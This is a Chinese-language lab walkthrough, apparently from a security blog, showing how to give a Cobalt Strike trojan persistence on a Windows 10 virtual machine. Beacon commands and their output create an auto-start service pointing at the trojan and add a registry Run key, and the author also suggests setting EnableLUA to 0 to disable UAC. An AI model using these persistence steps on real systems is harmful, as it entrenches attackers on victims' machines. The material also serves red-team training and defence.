准备环境

windows10 虚拟机

Cobalt Strike【这里部署在Windows10上，服务器置于云上】

过程

远程木马控制了windows10虚拟机，利用Cobalt Strike

在Cobalt Strike下进入beacon

比较说明【可执行文件留持久后门】

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 的值改为0
把这个值改成0，这样在自己的电脑上操作才是真正的administrators

查询注册表信息

shell reg query “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System”

EnableLUA 设置为1

​EnableLUA 设置为0

beacon> shell sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe"  【填写自己木马路径】
[*] Tasked beacon to run: sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe"
[+] host called home, sent: 94 bytes
[+] received output:
[SC] CreateService 成功
beacon> shell sc description "test" "测试"      【设置服务的描述】
[*] Tasked beacon to run: sc description "test" "测试"
[+] host called home, sent: 59 bytes
[+] received output:
[SC] ChangeServiceConfig2 成功
beacon> shell sc config "test" start= auto   【设置服务自启动】
[*] Tasked beacon to run: sc config "test" start= auto
[+] host called home, sent: 59 bytes
[+] received output:
[SC] ChangeServiceConfig 成功
beacon> shell net start "test"        [启动服务]
[*] Tasked beacon to run: net start "test"
[+] host called home, sent: 47 bytes
[+] received output:

结果上线！！！

或者

直接插入注册表里，成为自启动文件

继续——添加后门生成

shell reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” /v “calm” /t REG_SZ /d “C:\Users\calmness\calmnexx.exe” /f

​重启大法

依旧上线

补充一点：

beacon> shell cmd /k dir

[*] Tasked beacon to run: cmd /k dir

[+] host called home, sent: 41 bytes

[+] received output:

驱动器 C 中的卷没有标签

卷的序列号是 88B7-95BE

C:\Users\calmness\Desktop 的目录

2020/09/21  13:07    <DIR>          .

结束！！！

​

来源：freebuf.com 2020-09-28 19:20:37 by: calmness